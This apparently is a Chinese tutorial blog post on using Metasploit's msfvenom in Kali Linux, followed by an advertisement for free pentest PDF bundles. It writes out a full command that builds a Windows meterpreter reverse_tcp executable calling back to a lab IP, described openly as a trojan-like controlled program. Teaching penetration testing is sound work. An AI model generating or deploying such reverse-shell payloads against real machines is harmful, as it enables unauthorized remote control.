本文讲解采用的Kali版本为2017.1版及其附带软件,版本不同仅做参照
被控端就是要运行在目标计算机上的,这个程序的功能听起来和木马很像,实际上也是如此。另外实际上要在渗透漏洞代码中替换的Shellcode部分就是这个远程控制程序的被控端的代码。现在先来学习一下如何生成被控端(这个被控端既可以是一段代码,也可以是一个直接执行的程序)。
在Kali Linux中提供了多个可以用来产生远程控制被控端程序的方式,但是其中最为简单强大的方法应该要数Msfvenom命令了。这个命令是著名渗透测试软件Metasploit的一个功能,但是可以直接在Kali Linux中使用这个命令。
以前旧版本的Metasploit中提供了两条关于远程控制被控端程序的命令,其中msfpayload负责用来生成攻击载荷,msfencode负责对攻击载荷进行编码。新版本的Metasploit中将这两条命令整合成为了msfvenom命令,下面给出了msfvenom的几个常见的使用参数。
Options:
-p, --payload 指定要生成的payload(攻击荷载)。如果需要使用自定义的payload,请使用’-'或者stdin指定
-f, --format 指定输出格式 (可以使用 --help-formats 来获取msf支持的输出格式列表)
-o, --out
指定存储payload的位置 –payload-options 列举payload的标准选项
–help-formats 查看msf支持的输出格式列表
这里面的参数很多,但是实际使用起来很简单,例如如果只是希望生成一个简单的被控端程序,那么只需要使用参数-p、-f和-o即可,分别指定要使用的被控端程序、要应用的平台(这里以windows为例)、保存的位置。
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp
lhost=192.168.169.130 lport=5000 -f exe -o /root/payload.exe
这里面使用最简单的msfvenom命令来生成一个被控端程序,使用的被控端程序就是一个用于Windows平台下的反向远程控制程序:windows/meterpreter/reverse_tcp,它的参数lhost的值为192.168.169.130(这个地址也就是所使用的Kali Linux虚拟机的IP地址)。
最后
这里给大家分享一份Kali Linux 系统资料包:戳这里👉《12份Kali Linux渗透测试PDF资料》免费领取!
1.目录
基于Android设备的Kali Linux渗透测试教程1
基于Android设备的Kali Linux渗透测试教程2
Web渗透测试使用kali linux
kali-linux中文指南
kali-linux-wireless-pentest
kali-linux-network-scanning-cookbook
kali-linux-cookbook
Kali 基本命令大全
Kali Linux渗透测试技术详解
Kali Linux 安全渗透教程
Kali Linux 高级渗透测试
Kali Linux渗透测试的艺术
戳这里👉《12份Kali Linux渗透测试PDF资料》免费领取!
2.Kali Linux 渗透测试技术详解
Linux安全渗透简介
配置Kali Linux
高级测试实验室
信息收集
漏洞扫描
漏洞利用
权限提升
密码攻击
无线网络渗透测试
3.Kali 基本命令大全
系统信息
文件和目录
文件搜索
挂载一个文件系统
磁盘空间
用户和群组
打包和压缩文件
查看文件内容
文本处理
…
4.Kali Linux 高级渗透测试
基于目标的渗透测试
开源情报和被动侦察
外网和内网的主动侦察
漏洞评估
物理安全和社会工程学
…
5.Kali Linux 中文指南
Kali Linux介绍
Kali Linux安装
Kali Linux一般应用
Kali Linux ARM应用
Kali Linux开发
6.Kali Linux 菜单栏各工具的使用
仅展示部分内容▼
更多网络安全学习资源可扫描下方卡片,免费分享!